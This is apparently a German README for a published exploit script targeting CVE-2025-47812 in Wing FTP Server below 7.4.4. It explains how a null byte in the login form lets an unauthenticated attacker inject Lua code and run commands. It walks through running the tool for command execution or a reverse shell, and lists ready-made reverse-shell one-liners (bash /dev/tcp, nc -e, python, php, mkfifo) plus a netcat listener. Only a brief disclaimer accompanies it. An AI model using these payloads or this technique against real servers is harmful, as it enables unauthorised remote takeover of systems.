
Nicht authentifizierter Remotecodeausführungs-Exploit für Wing FTP Server < 7.4.4. Injiziert Lua-Code über ein Null-Byte im Anmeldeformular, um Befehle auszuführen oder Reverse Shells zu starten. Enthält mehrere Payload-Typen.
===========================================================
Autor: blindma1den
Datum: Juli 2025
Exploit-Typ: Remotecodeausführung (Unauthenticated)
Ziel: Wing FTP Server < 7.4.4
CVSS-Score: 10.0 (Kritisch)
Dieses Skript nutzt CVE-2025-47812 aus, eine kritische Schwachstelle im Webinterface von Wing FTP Server, die es entfernten Angreifern ermöglicht, beliebige Systembefehle auszuführen oder eine Reverse Shell ohne Authentifizierung zu öffnen.
Der Fehler wird durch unsachgemäße Handhabung von Nullbytes (%00)
im Anmeldeformular (/loginok.html) verursacht. Dies ermöglicht die
Injektion von Lua-Code in Sitzungsdateien, die später ausgewertet werden,
wenn Endpunkte wie /dir.html aufgerufen werden.
NVD-Beschreibung: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
whoami, uname -a)Abhängigkeiten installieren:
pip install requests
Skript ausführen:
python3 wingftp_rce_exploit.py
Sie werden nach Folgendem gefragt:
[1] BEFEHL AUSFÜHREN:
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami
[2] REVERSE SHELL:
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 2
Reverse shell IP address: 192.168.1.100
Reverse shell port: 4444
Starten Sie Ihren Listener, bevor Sie die Shell auslösen:
nc -lvnp 4444
Bash: bash -i >& /dev/tcp/IP/PORT 0>&1
Python3: python3 -c 'import socket,subprocess,os; ...'
Netcat: nc IP PORT -e /bin/sh
PHP: php -r '$sock=fsockopen("IP",PORT); ...'
FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...
Dieser Code dient nur zu Bildungszwecken. Verwenden Sie diesen Exploit NICHT gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Genehmigung zum Testen haben. Unberechtigte Nutzung ist illegal und unethisch.
Patchen Sie Ihre Systeme sofort. Wing FTP Server 7.4.4 behebt diese Schwachstelle.
Happy hacking!